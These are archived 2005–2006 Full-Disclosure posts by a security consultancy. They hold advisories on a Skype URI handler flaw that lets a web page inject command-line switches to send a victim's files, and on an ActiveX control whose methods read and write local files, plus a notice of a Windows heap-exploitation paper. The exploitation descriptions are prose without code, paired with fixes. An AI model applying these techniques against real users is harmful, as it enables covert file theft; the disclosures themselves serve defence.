= Vendor Website: 
= http://www.skype.com
= Affected Version:
=   Skype for Windows:
= All releases prior to and including 2.0.*.104
= Release 2.5.*.0 to and including 2.5.*.78
= Public disclosure on May 22, 2006

== Overview ==

During the typical installation of the Windows Skype client, several
URI handlers are installed. This allows for easy access to the Skype
client through various URI types.

Due to a flaw in the handling of one of these types, it is possible to
include additional command line switches to be passed to the Skype
client. One of these switches will initiate a file transfer, sending 
the specified file to an arbitrary Skype user. 

== Exploitation ==

Exploitation occurs when the victim opens the exploit URI in Internet
Explorer. This requires the victim to visit a website under the
control, or to be convinced into opening a malicious HTML page. Clicking

on a link is not required, as this action can be automated in various 
ways using scripting language.

For the attack to be successful the attacker must know the location
of the requested file on the victims machine. One common target file
would be the victims Skype configuration file.

For the file transfer to succeed the attacker must have authorised
the victim, which can be done by adding the victim to the attackers
contact list. This does not require any authorisation from the 
victim Skype user.

Other Skype command line switches could also be exploited to manipulate
or obtain the Skype users credentials, under similar situations.
== Solutions ==

- Install the vendor supplied upgrade
== Credit ==

Discovered and advised to Skype Limited May, 2006 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is New Zealand's leading team of Information 
Security consultants specialising in providing high quality Information
Security services to clients throughout Australasia. Our clients range
from small businesses to some of the largest globally recognized
Security-Assessment.com has no vendor relationships and positions itself
as the only independent security assurance provider in New Zealand.

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Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] -Exploiting Freelist[0] On Windows XP Service Pack 2-

2005-12-07 Thread Brett Moore
-Exploiting Freelist[0] On Windows XP Service Pack 2-

Windows XP Service pack 2 introduced some new security measures in an
attempt to prevent the use of overwritten heap headers to do arbitrary
byte writing. This method of exploiting heap overflows, and the protection
offered by service pack 2, is widely known and has been well documented
in the past.

What this paper will attempt to explain is how other functionality of the
heap management code can be used to gain execution control after a chunk
header has been overwritten.

In particular this paper takes a look at exploiting freelist[0] overwrites.

It can currently be downloaded from our website

Brett Moore
Network Intrusion Specialist, CTO


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[Full-disclosure] WebArchiveX - Unsafe Methods Vulnerability

2005-09-06 Thread Brett Moore

= WebArchiveX - Unsafe Methods Vulnerability
= Vendor Website: 
= http://http://www.csystems.co.il/webarchivex/index.aspx
= Affected Version:
=WebArchiveX.dll Installed Prior To Sep 6th, 2005
= Public disclosure on September 07, 2005

== Overview ==

The WebArchiveX component gives developers the ability to include .MHT
archive creation in their software and is compatible with a wide range
of programming languages.

Prior to September 6th 2005, the activeX component would install and
mark itself 'safe for scripting'. The component offers various methods
that when instantiated by a malicious web site, can be used to read files 
from, or write files to the local computer.

== Exploitation ==

The component has an extensive API that can be viewed online;

This advisory concentrates on the two following methods;

* MakeArchive- Build MHT web archive (single MHT file)
  Boolean MakeArchive(
 String htmlFile,
 String userAgent,
 String mhtFile

  The MakeArchive method will accept a local path as the mhtFile 
  parameter, allowing a malicious web site to write a file to the local
  drive. By writing to the startup folder, it is possible to create a 
  .mht that will be executed locally at startup.

* MakeArchiveStr - Build MHT web archive and returns it as a string
  String MakeArchiveStr(
 String htmlFile,
 String userAgent

  The MakeArchiveStr method will accept a local path as the htmlFile
  parameter. After reading in the file, the contents will be returned
  to the calling script. This allows a malicious website to read the 
  contents of any file accessible by the current user.  

== Solutions ==

- The vendor has changed the default installation to remove the 'safe for
  scripting' entry, but unfortunately has not changed the version number.
  The download now includes a readme file that contains;

  Why WebArchiveX is not safe for scripting?

  If WebArchiveX was safe for scripting, then malicious websites
  could use WebArchiveX in order to read/write files from/to your
  local file system. Please contact [EMAIL PROTECTED] for
  further details!

  In order to make WebArchiveX safe for scripting you can import
  the enclosed Registry file WebArchiveX_SafeForScripting.reg.

- To identify if this component is installed on your pc, search the 
  registry for WebArchiveX entries.

- If the entry is located, remove the 'safe for scripting' entry by
  removing these keys;
\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}

- For additional help contact [EMAIL PROTECTED]
== Credit ==

Discovered and advised to cSystems August, 2005 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

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Full-Disclosure - We believe in it.
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